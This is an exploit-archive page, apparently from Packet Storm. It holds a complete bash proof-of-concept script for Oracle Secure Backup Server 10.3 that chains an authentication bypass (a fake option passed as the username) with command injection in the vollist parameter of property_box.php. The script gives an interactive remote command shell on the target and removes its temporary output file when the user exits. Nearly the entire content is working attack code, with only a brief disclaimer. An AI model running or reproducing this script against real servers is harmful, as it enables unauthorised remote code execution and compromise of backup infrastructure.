what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle Secure Backup Server Bypass / Command Injection

Oracle Secure Backup Server Bypass / Command Injection
Posted Sep 15, 2009
Authored by Luca Carettoni | Site ikkisoft.com

Oracle Secure Backup Administration Server suffers from authentication bypass and command injection vulnerabilities.

tags | exploit, vulnerability, bypass
advisories | CVE-2009-1977, CVE-2009-1978
SHA-256 | 8bbf1a7668ebf7f94b2ec20073f80c9f8f048f84184c40ab8880774b4df54dd6

Oracle Secure Backup Server Bypass / Command Injection

Change Mirror Download
#!/bin/bash

#Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability
#1-day exploit for CVE-2009-1977 and CVE-2009-1978

#PoC script successfully tested on:
#Oracle Secure Backup Server 10.3.0.1.0_win32_release
#MS Windows Professional XP SP3

#In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server.
#Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart
#authentication bypass and a trivial command injection, resulting in arbitrary command execution.

#References:
#http://www.zerodayinitiative.com/advisories/ZDI-09-058/
#http://www.zerodayinitiative.com/advisories/ZDI-09-059/

#Use it for ethical pentesting only! The author accepts no liability for damage caused by this tool.
#Luca "ikki" Carettoni (blog.nibblesec.org), 10th September 2009

clear
echo ":: Oracle Secure Backup Admin Server 10.3 AuthBypass/CodeExec Exploit ::"

if [[ $# -ne 1 ]]
then
echo "usage: ./$(basename $0) <target IP>"
echo "i.e.: ./$(basename $0) 192.168.0.100"
exit
fi

if ! which curl >/dev/null
then
echo "'curl' is required in order to handle HTTPS connections"
exit
fi

TARGET=$1

#Exploiting CVE-2009-1977 and getting a valid token
echo "[+] Exploiting CVE-2009-1977 against $TARGET"
postdata="button=Login&attempt=1&mode=&tab=&uname=--fakeoption&passwd=fakepwd"
session=`curl -kis "https://$TARGET/login.php" -d $postdata | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1`

if [[ -z $session ]]
then
echo "[!] Fatal error. No valid token has been retrieved"
exit
fi

echo "[+] I got a valid token: $session"

#Use a valid session and CVE-2009-1978 in order to inject arbitrary commands
echo "[+] Exploiting CVE-2009-1978 against $TARGET"
shell="1%26ver>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
check=`curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft`

if [[ -z $check ]]
then
echo "[!] Fatal error. I cannot execute arbitrary commands"
exit
fi

echo "[+] Enjoy your non-interactive shell! Use EXIT to clean up everything"
echo
echo \>$check

while(true); do
echo -n \>
read -r cmd

if [ "$cmd" == "EXIT" ]
then
echo "[+] Removing the temporary file and closing"
shell="1%26del%20osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
exit
fi

#URLencode function
cmd=`echo -n "$cmd"|od -t x1 -A n|tr " " %`
shell="1%26$cmd>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
echo "[+] Last successful command execution:"
curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session"
done
#end

Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    9 Files
  • 30
    Nov 30th
    21 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close